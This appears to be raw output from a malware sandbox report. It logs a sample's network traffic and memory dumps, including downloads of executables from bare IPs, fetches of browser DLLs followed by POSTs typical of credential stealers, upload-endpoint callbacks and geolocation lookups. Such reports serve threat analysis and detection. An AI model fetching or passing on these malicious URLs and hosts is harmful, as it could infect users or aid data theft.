• 162.159.129.233:80 | cdn.discordapp.com | tls | 361 B | 528 B | 5 | 5
• 89.221.213.3:80 | www.quickfastfuriousloaded.com | 152 B | 3
• 162.159.129.233:80 | cdn.discordapp.com | tls | 361 B | 528 B | 5 | 5
• 172.67.158.82:80 | jom.diregame.live | tls | 288 B | 528 B | 5 | 5
• 162.159.129.233:80 | cdn.discordapp.com | tls | 288 B | 528 B | 5 | 5
• 172.67.158.82:80 | jom.diregame.live | 190 B | 92 B | 4 | 2
• 162.159.129.233:80 | cdn.discordapp.com | tls | 361 B | 528 B | 5 | 5
• 162.159.129.233:80 | cdn.discordapp.com | tls | 288 B | 528 B | 5 | 5
• 162.159.129.233:80 | cdn.discordapp.com | 190 B | 92 B | 4 | 2
• 172.67.158.82:443 | jom.diregame.live | tls | 960 B | 5.2kB | 9 | 10
• 162.159.129.233:80 | cdn.discordapp.com | tls | 288 B | 528 B | 5 | 5
• 162.159.129.233:443 | cdn.discordapp.com | tls | 17.3kB | 1.0MB | 364 | 705
• 162.159.129.233:80 | cdn.discordapp.com | 190 B | 92 B | 4 | 2
• 162.159.129.233:80 | cdn.discordapp.com | 190 B | 92 B | 4 | 2
• 162.159.129.233:443 | cdn.discordapp.com | tls | 78.0kB | 4.9MB | 1684 | 3277
• 104.21.46.30:443 | pcfixmy-download-13.xyz | tls | 39.4kB | 2.2MB | 756 | 1494
• 162.159.129.233:443 | cdn.discordapp.com | tls | 41.8kB | 2.5MB | 897 | 1716
• 172.67.186.79:443 | d.dirdgame.live | tls | 13.1kB | 726.6kB | 273 | 501
• 136.144.41.133:80 | http://136.144.41.133/WW/file8.exe | http | 37.6kB | 1.9MB | 781 | 1282
    HTTP Request: GET http://136.144.41.133/WW/file8.exe
    HTTP Response: 200
• 157.90.127.76:80 | http://157.90.127.76/ | http | 46.7kB | 2.5MB | 873 | 1654
    HTTP Request: POST http://157.90.127.76/706
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/freebl3.dll
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/mozglue.dll
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/msvcp140.dll
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/nss3.dll
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/softokn3.dll
    HTTP Response: 200
    HTTP Request: GET http://157.90.127.76/vcruntime140.dll
    HTTP Response: 200
    HTTP Request: POST http://157.90.127.76/
    HTTP Response: 200
• 104.21.51.159:443 | iphonemoney.xyz | tls | 39.0kB | 2.2MB | 744 | 1475
• 208.95.112.1:80 | http://ip-api.com/json/ | http | 774 B | 672 B | 6 | 4
    HTTP Request: GET http://ip-api.com/json/
    HTTP Response: 200
• 87.251.71.195:82 | 152 B | 3
• 185.20.227.194:80 | 152 B | 3
• 89.221.213.3:80 | www.quickfastfuriousloaded.com | 152 B | 3
• 208.95.112.1:80 | http://ip-api.com/json/?fields=8198 | http | 1.6kB | 1.2kB | 10 | 6
    HTTP Request: GET http://ip-api.com/json/?fields=8198
    HTTP Response: 200
    HTTP Request: GET http://ip-api.com/json/?fields=8198
    HTTP Response: 200
    HTTP Request: GET http://ip-api.com/json/?fields=8198
    HTTP Response: 200
    HTTP Request: GET http://ip-api.com/json/?fields=8198
    HTTP Response: 200
• 172.67.200.215:80 | http://iw.gamegame.info/report7.4.php | http | 2.2kB | 2.8kB | 10 | 11
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 200
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 200
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 200
• 185.20.227.194:80 | 152 B | 3
• 31.13.83.36:443 | www.facebook.com | tls | 11.7kB | 538.4kB | 219 | 402
• 104.21.21.221:80 | http://ol.gamegame.info/report7.4.php | http | 870 B | 964 B | 6 | 5
    HTTP Request: POST http://ol.gamegame.info/report7.4.php
    HTTP Response: 200
• 87.251.71.195:82 | 152 B | 3
• 77.246.145.4:80 | http://zedaumalev.xyz/ | http | 734 B | 5.4kB | 8 | 10
    HTTP Request: POST http://zedaumalev.xyz/
    HTTP Response: 200
• 172.67.75.172:443 | api.ip.sb | tls | 802 B | 4.1kB | 10 | 9
• 88.218.92.148:80 | http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e | http | 1.2kB | 839 B | 9 | 8
    HTTP Request: GET http://uyg5wye.2ihsfa.com/api/fbtime
    HTTP Response: 200
    HTTP Request: POST http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e
    HTTP Response: 200
• 74.114.154.22:443 | sergeevih43.tumblr.com | tls | 1.1kB | 20.6kB | 15 | 19
• 74.114.154.22:443 | sergeevih43.tumblr.com | tls | 956 B | 5.9kB | 11 | 12
• 157.90.127.76:80 | http://157.90.127.76/ | http | 4.9kB | 928 B | 10 | 8
    HTTP Request: POST http://157.90.127.76/865

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://157.90.127.76/

                                                                HTTP Response

                                                                200
                                                              • 185.20.227.194:80
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 88.218.92.148:80
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb
                                                                http
                                                                1.2kB
                                                                799 B
                                                                9
                                                                7

                                                                HTTP Request

                                                                GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb

                                                                HTTP Response

                                                                200
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                1.3kB
                                                                6.4kB
                                                                11
                                                                12
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 136.144.41.152:80
                                                                http://136.144.41.152/base/api/getData.php
                                                                http
                                                                1.5kB
                                                                939 B
                                                                8
                                                                5

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200
                                                              • 88.99.66.31:443
                                                                iplis.ru
                                                                tls
                                                                1.1kB
                                                                5.5kB
                                                                8
                                                                8
                                                              • 77.246.145.4:80
                                                                http://zedaumalev.xyz/
                                                                http
                                                                16.0kB
                                                                1.3kB
                                                                17
                                                                12

                                                                HTTP Request

                                                                POST http://zedaumalev.xyz/

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://zedaumalev.xyz/

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                860 B
                                                                465 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                793 B
                                                                498 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 43.132.165.55:80
                                                                http://dgos.top/dl/build.exe
                                                                http
                                                                15.5kB
                                                                931.8kB
                                                                334
                                                                645

                                                                HTTP Request

                                                                GET http://dgos.top/dl/build.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                823 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                855 B
                                                                513 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 152.89.247.174:80
                                                                http://152.89.247.174/blog/files/sefile.exe
                                                                http
                                                                7.8kB
                                                                456.2kB
                                                                166
                                                                313

                                                                HTTP Request

                                                                GET http://152.89.247.174/blog/files/sefile.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                807 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                725 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                773 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                803 B
                                                                499 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 185.215.113.62:51929
                                                                http://185.215.113.62:51929/
                                                                http
                                                                556 B
                                                                132 B
                                                                4
                                                                3

                                                                HTTP Request

                                                                POST http://185.215.113.62:51929/
                                                              • 37.120.239.108:80
                                                                http://37.120.239.108/200.exe
                                                                http
                                                                11.6kB
                                                                724.6kB
                                                                248
                                                                544

                                                                HTTP Request

                                                                GET http://37.120.239.108/200.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                672 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                702 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                747 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                907 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                894 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                799 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                842 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 77.123.139.190:443
                                                                api.2ip.ua
                                                                tls
                                                                970 B
                                                                8.1kB
                                                                11
                                                                10
                                                              • 185.215.113.64:8765
                                                                http://185.215.113.64:8765/
                                                                http
                                                                647 B
                                                                5.2kB
                                                                6
                                                                7

                                                                HTTP Request

                                                                POST http://185.215.113.64:8765/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                762 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                729 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                647 B
                                                                793 B
                                                                5
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                761 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 172.67.75.172:443
                                                                api.ip.sb
                                                                tls
                                                                716 B
                                                                5.3kB
                                                                8
                                                                10
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                783 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                825 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                833 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 8.8.8.8:53
                                                                motiwa.xyz
                                                                dns
                                                                setup_install.exe
                                                                56 B
                                                                88 B
                                                                1
                                                                1

                                                                DNS Request

                                                                motiwa.xyz

                                                                DNS Response

                                                                104.21.12.59
                                                                172.67.193.180

                                                              • 8.8.8.8:53
                                                                ip-api.com
                                                                dns
                                                                arnatic_4.exe
                                                                56 B
                                                                72 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ip-api.com

                                                                DNS Response

                                                                208.95.112.1

                                                              • 8.8.8.8:53
                                                                email.yg9.me
                                                                dns
                                                                SystemNetworkService
                                                                58 B
                                                                74 B
                                                                1
                                                                1

                                                                DNS Request

                                                                email.yg9.me

                                                                DNS Response

                                                                198.13.62.186

                                                              • 8.8.8.8:53
                                                                email.yg9.me
                                                                dns
                                                                SystemNetworkService
                                                                58 B
                                                                129 B
                                                                1
                                                                1

                                                                DNS Request

                                                                email.yg9.me

                                                              • 8.8.8.8:53
                                                                videoconvert-download38.xyz
                                                                dns
                                                                arnatic_5.exe
                                                                73 B
                                                                105 B
                                                                1
                                                                1

                                                                DNS Request

                                                                videoconvert-download38.xyz

                                                                DNS Response

                                                                172.67.201.250
                                                                104.21.42.63

                                                              • 198.13.62.186:53
                                                                email.yg9.me
                                                                65.6kB
                                                                764.2kB
                                                                1251
                                                                1376
                                                              • 8.8.8.8:53
                                                                www.facebook.com
                                                                dns
                                                                arnatic_4.exe
                                                                62 B
                                                                107 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.facebook.com

                                                                DNS Response

                                                                31.13.83.36

                                                              • 8.8.8.8:53
                                                                iplogger.org
                                                                dns
                                                                58 B
                                                                74 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iplogger.org

                                                                DNS Response

                                                                88.99.66.31

                                                              • 8.8.8.8:53
                                                                ipinfo.io
                                                                dns
                                                                55 B
                                                                71 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ipinfo.io

                                                                DNS Response

                                                                34.117.59.81

                                                              • 8.8.8.8:53
                                                                pki.goog
                                                                dns
                                                                54 B
                                                                70 B
                                                                1
                                                                1

                                                                DNS Request

                                                                pki.goog

                                                                DNS Response

                                                                216.239.32.29

                                                              • 8.8.8.8:53
                                                                sergeevih43.tumblr.com
                                                                dns
                                                                68 B
                                                                100 B
                                                                1
                                                                1

                                                                DNS Request

                                                                sergeevih43.tumblr.com

                                                                DNS Response

                                                                74.114.154.22
                                                                74.114.154.18

                                                              • 8.8.8.8:53
                                                                freeprivacytoolsforyou.xyz
                                                                dns
                                                                72 B
                                                                88 B
                                                                1
                                                                1

                                                                DNS Request

                                                                freeprivacytoolsforyou.xyz

                                                                DNS Response

                                                                45.133.245.228

                                                              • 8.8.8.8:53
                                                                cdn.discordapp.com
                                                                dns
                                                                64 B
                                                                144 B
                                                                1
                                                                1

                                                                DNS Request

                                                                cdn.discordapp.com

                                                                DNS Response

                                                                162.159.129.233
                                                                162.159.135.233
                                                                162.159.133.233
                                                                162.159.130.233
                                                                162.159.134.233

                                                              • 8.8.8.8:53
                                                                jom.diregame.live
                                                                dns
                                                                63 B
                                                                95 B
                                                                1
                                                                1

                                                                DNS Request

                                                                jom.diregame.live

                                                                DNS Response

                                                                172.67.158.82
                                                                104.21.65.45

                                                              • 8.8.8.8:53
                                                                flamkravmaga.com
                                                                dns
                                                                248 B
                                                                248 B
                                                                4
                                                                4

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                              • 8.8.8.8:53
                                                                www.quickfastfuriousloaded.com
                                                                dns
                                                                76 B
                                                                92 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.quickfastfuriousloaded.com

                                                                DNS Response

                                                                89.221.213.3

                                                              • 8.8.8.8:53
                                                                pcfixmy-download-13.xyz
                                                                dns
                                                                69 B
                                                                101 B
                                                                1
                                                                1

                                                                DNS Request

                                                                pcfixmy-download-13.xyz

                                                                DNS Response

                                                                104.21.46.30
                                                                172.67.222.237

                                                              • 8.8.8.8:53
                                                                d.dirdgame.live
                                                                dns
                                                                61 B
                                                                93 B
                                                                1
                                                                1

                                                                DNS Request

                                                                d.dirdgame.live

                                                                DNS Response

                                                                172.67.186.79
                                                                104.21.59.252

                                                              • 8.8.8.8:53
                                                                iphonemoney.xyz
                                                                dns
                                                                61 B
                                                                93 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iphonemoney.xyz

                                                                DNS Response

                                                                104.21.51.159
                                                                172.67.182.129

                                                              • 8.8.8.8:53
                                                                flamkravmaga.com
                                                                dns
                                                                248 B
                                                                248 B
                                                                4
                                                                4

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                              • 8.8.8.8:53
                                                                iw.gamegame.info
                                                                dns
                                                                62 B
                                                                94 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iw.gamegame.info

                                                                DNS Response

                                                                172.67.200.215
                                                                104.21.21.221

                                                              • 8.8.8.8:53
                                                                www.facebook.com
                                                                dns
                                                                arnatic_4.exe
                                                                62 B
                                                                107 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.facebook.com

                                                                DNS Response

                                                                31.13.83.36

                                                              • 8.8.8.8:53
                                                                ol.gamegame.info
                                                                dns
                                                                62 B
                                                                94 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ol.gamegame.info

                                                                DNS Response

                                                                104.21.21.221
                                                                172.67.200.215

                                                              • 8.8.8.8:53
                                                                zedaumalev.xyz
                                                                dns
                                                                60 B
                                                                76 B
                                                                1
                                                                1

                                                                DNS Request

                                                                zedaumalev.xyz

                                                                DNS Response

                                                                77.246.145.4

                                                              • 8.8.8.8:53
                                                                api.ip.sb
                                                                dns
                                                                55 B
                                                                145 B
                                                                1
                                                                1

                                                                DNS Request

                                                                api.ip.sb

                                                                DNS Response

                                                                172.67.75.172
                                                                104.26.13.31
                                                                104.26.12.31

                                                              • 8.8.8.8:53
                                                                uyg5wye.2ihsfa.com
                                                                dns
                                                                64 B
                                                                80 B
                                                                1
                                                                1

                                                                DNS Request

                                                                uyg5wye.2ihsfa.com

                                                                DNS Response

                                                                88.218.92.148

                                                              • 8.8.8.8:53
                                                                www.microsoft.com
                                                                dns
                                                                63 B
                                                                230 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.microsoft.com

                                                                DNS Response

                                                                2.21.41.70

                                                              • 8.8.8.8:53
                                                                iplis.ru
                                                                dns
                                                                54 B
                                                                70 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iplis.ru

                                                                DNS Response

                                                                88.99.66.31

                                                              • 8.8.8.8:53
                                                                ppcspb.com
                                                                dns
                                                                224 B
                                                                224 B
                                                                4
                                                                4

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                              • 8.8.8.8:53
                                                                mebbing.com
                                                                dns
                                                                228 B
                                                                228 B
                                                                4
                                                                4

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                              • 8.8.8.8:53
                                                                twcamel.com
                                                                dns
                                                                228 B
                                                                228 B
                                                                4
                                                                4

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                              • 8.8.8.8:53
                                                                howdycash.com
                                                                dns
                                                                236 B
                                                                236 B
                                                                4
                                                                4

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                              • 8.8.8.8:53
                                                                lahuertasonora.com
                                                                dns
                                                                64 B
                                                                224 B
                                                                1
                                                                1

                                                                DNS Request

                                                                lahuertasonora.com

                                                                DNS Response

                                                                79.106.245.34
                                                                175.117.131.126
                                                                211.53.230.69
                                                                115.91.217.231
                                                                152.171.10.3
                                                                91.203.174.38
                                                                179.38.125.180
                                                                190.141.221.178
                                                                211.169.6.249
                                                                37.75.44.24

                                                              • 8.8.8.8:53  dgos.top  dns  54 B  70 B  1  1
                                                                DNS Request: dgos.top
                                                                DNS Response: 43.132.165.55

                                                              • 8.8.8.8:53  sndvoices.com  dns  59 B  132 B  1  1
                                                                DNS Request: sndvoices.com

                                                              • 8.8.8.8:53  api.2ip.ua  dns  56 B  72 B  1  1
                                                                DNS Request: api.2ip.ua
                                                                DNS Response: 77.123.139.190

                                                              • 8.8.8.8:53  api.ip.sb  dns  55 B  145 B  1  1
                                                                DNS Request: api.ip.sb
                                                                DNS Response: 172.67.75.172, 104.26.12.31, 104.26.13.31

                                                              MITRE ATT&CK Enterprise v6


                                                              Downloads

                                                              • memory/720-199-0x0000000000100000-0x0000000000101000-memory.dmp (Filesize 4KB)
                                                              • memory/720-207-0x00000000002F0000-0x00000000002F1000-memory.dmp (Filesize 4KB)
                                                              • memory/720-205-0x0000000000240000-0x0000000000241000-memory.dmp (Filesize 4KB)
                                                              • memory/720-220-0x0000000004B80000-0x0000000004B81000-memory.dmp (Filesize 4KB)
                                                              • memory/720-206-0x00000000002B0000-0x00000000002EE000-memory.dmp (Filesize 248KB)
                                                              • memory/756-269-0x00000000003A0000-0x00000000003A1000-memory.dmp (Filesize 4KB)
                                                              • memory/856-288-0x00000000002F0000-0x000000000035B000-memory.dmp (Filesize 428KB)
                                                              • memory/856-289-0x0000000000400000-0x0000000000529000-memory.dmp (Filesize 1.2MB)
                                                              • memory/868-187-0x0000000000BC0000-0x0000000000C31000-memory.dmp (Filesize 452KB)
                                                              • memory/868-250-0x0000000001A00000-0x0000000001A71000-memory.dmp (Filesize 452KB)
                                                              • memory/868-249-0x0000000000A90000-0x0000000000ADC000-memory.dmp (Filesize 304KB)
                                                              • memory/912-224-0x0000000000320000-0x0000000000321000-memory.dmp (Filesize 4KB)
                                                              • memory/912-227-0x0000000000600000-0x0000000000601000-memory.dmp (Filesize 4KB)
                                                              • memory/912-226-0x0000000000400000-0x0000000000432000-memory.dmp (Filesize 200KB)
                                                              • memory/912-225-0x00000000003C0000-0x00000000003C1000-memory.dmp (Filesize 4KB)
                                                              • memory/912-191-0x00000000012B0000-0x00000000012B1000-memory.dmp (Filesize 4KB)
                                                              • memory/1060-164-0x0000000000350000-0x0000000000351000-memory.dmp (Filesize 4KB)
                                                              • memory/1060-167-0x000000001B140000-0x000000001B142000-memory.dmp (Filesize 8KB)
                                                              • memory/1060-166-0x0000000000380000-0x0000000000381000-memory.dmp (Filesize 4KB)
                                                              • memory/1060-165-0x0000000000360000-0x000000000037F000-memory.dmp (Filesize 124KB)
                                                              • memory/1060-162-0x00000000012D0000-0x00000000012D1000-memory.dmp (Filesize 4KB)
                                                              • memory/1256-219-0x0000000002A50000-0x0000000002A66000-memory.dmp (Filesize 88KB)
                                                              • memory/1352-188-0x0000000000280000-0x00000000002F1000-memory.dmp (Filesize 452KB)
                                                              • memory/1352-254-0x0000000000300000-0x000000000031B000-memory.dmp (Filesize 108KB)
                                                              • memory/1352-184-0x0000000000060000-0x00000000000AC000-memory.dmp (Filesize 304KB)
                                                              • memory/1352-255-0x00000000030E0000-0x00000000031E6000-memory.dmp (Filesize 1.0MB)
                                                              • memory/1380-109-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize 100KB)
                                                              • memory/1380-120-0x000000006B440000-0x000000006B4CF000-memory.dmp (Filesize 572KB)
                                                              • memory/1380-89-0x000000006B440000-0x000000006B4CF000-memory.dmp (Filesize 572KB)
                                                              • memory/1380-136-0x0000000000400000-0x000000000051E000-memory.dmp (Filesize 1.1MB)
                                                              • memory/1380-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp (Filesize 1.5MB)
                                                              • memory/1380-91-0x000000006B280000-0x000000006B2A6000-memory.dmp (Filesize 152KB)
                                                              • memory/1380-92-0x0000000000400000-0x000000000051E000-memory.dmp (Filesize 1.1MB)
                                                              • memory/1380-107-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize 100KB)
                                                              • memory/1380-131-0x000000006B280000-0x000000006B2A6000-memory.dmp (Filesize 152KB)
                                                              • memory/1380-129-0x000000006FE40000-0x000000006FFC6000-memory.dmp (Filesize 1.5MB)
                                                              • memory/1380-105-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize 100KB)
                                                              • memory/1380-116-0x0000000064940000-0x0000000064959000-memory.dmp (Filesize 100KB)
                                                              • memory/1408-173-0x00000000000A0000-0x00000000000A1000-memory.dmp (Filesize 4KB)
                                                              • memory/1436-284-0x0000000001DA0000-0x0000000001EBB000-memory.dmp (Filesize 1.1MB)
                                                              • memory/1640-216-0x00000000008F0000-0x00000000008F1000-memory.dmp (Filesize 4KB)
                                                              • memory/1680-201-0x0000000000390000-0x0000000000391000-memory.dmp (Filesize 4KB)
                                                              • memory/1680-208-0x00000000003F0000-0x00000000003F1000-memory.dmp (Filesize 4KB)
                                                              • memory/1680-204-0x00000000003A0000-0x00000000003B0000-memory.dmp (Filesize 64KB)
                                                              • memory/1680-197-0x0000000000180000-0x0000000000181000-memory.dmp (Filesize 4KB)
                                                              • memory/1800-179-0x0000000000240000-0x00000000002DD000-memory.dmp (Filesize 628KB)
                                                              • memory/1800-180-0x0000000000400000-0x0000000000949000-memory.dmp (Filesize 5.3MB)
                                                              • memory/1848-286-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
                                                              • memory/1880-203-0x0000000000400000-0x00000000008F4000-memory.dmp (Filesize 5.0MB)
                                                              • memory/1880-200-0x00000000001E0000-0x00000000001E9000-memory.dmp (Filesize 36KB)
                                                              • memory/1940-60-0x0000000075201000-0x0000000075203000-memory.dmp (Filesize 8KB)
                                                              • memory/1960-217-0x0000000000840000-0x0000000000841000-memory.dmp (Filesize 4KB)
                                                              • memory/1960-209-0x0000000000400000-0x000000000041E000-memory.dmp (Filesize 120KB)
                                                              • memory/1960-212-0x0000000000400000-0x000000000041E000-memory.dmp (Filesize 120KB)
                                                              • memory/2044-185-0x00000000003D0000-0x000000000042D000-memory.dmp (Filesize 372KB)
                                                              • memory/2044-183-0x0000000002160000-0x0000000002261000-memory.dmp (Filesize 1.0MB)
                                                              • memory/2144-264-0x0000000002D60000-0x0000000003686000-memory.dmp (Filesize 9.1MB)
                                                              • memory/2144-263-0x0000000000400000-0x0000000000D41000-memory.dmp (Filesize 9.3MB)
                                                              • memory/2200-245-0x0000000005150000-0x0000000005151000-memory.dmp (Filesize 4KB)
                                                              • memory/2224-258-0x0000000000310000-0x00000000003AD000-memory.dmp (Filesize 628KB)
                                                              • memory/2224-259-0x0000000000400000-0x000000000052D000-memory.dmp (Filesize 1.2MB)
                                                              • memory/2340-278-0x0000000000220000-0x000000000024F000-memory.dmp (Filesize 188KB)
                                                              • memory/2340-282-0x00000000049D3000-0x00000000049D4000-memory.dmp (Filesize 4KB)
                                                              • memory/2340-281-0x00000000049D2000-0x00000000049D3000-memory.dmp (Filesize 4KB)
                                                              • memory/2340-283-0x00000000049D4000-0x00000000049D6000-memory.dmp (Filesize 8KB)
                                                              • memory/2340-280-0x00000000049D1000-0x00000000049D2000-memory.dmp (Filesize 4KB)
                                                              • memory/2340-279-0x0000000000400000-0x00000000004E9000-memory.dmp (Filesize 932KB)
                                                              • memory/2348-262-0x0000000000400000-0x0000000000950000-memory.dmp (Filesize 5.3MB)
                                                              • memory/2348-261-0x0000000002320000-0x00000000023BD000-memory.dmp (Filesize 628KB)
                                                              • memory/2468-248-0x0000000000210000-0x000000000026D000-memory.dmp (Filesize 372KB)
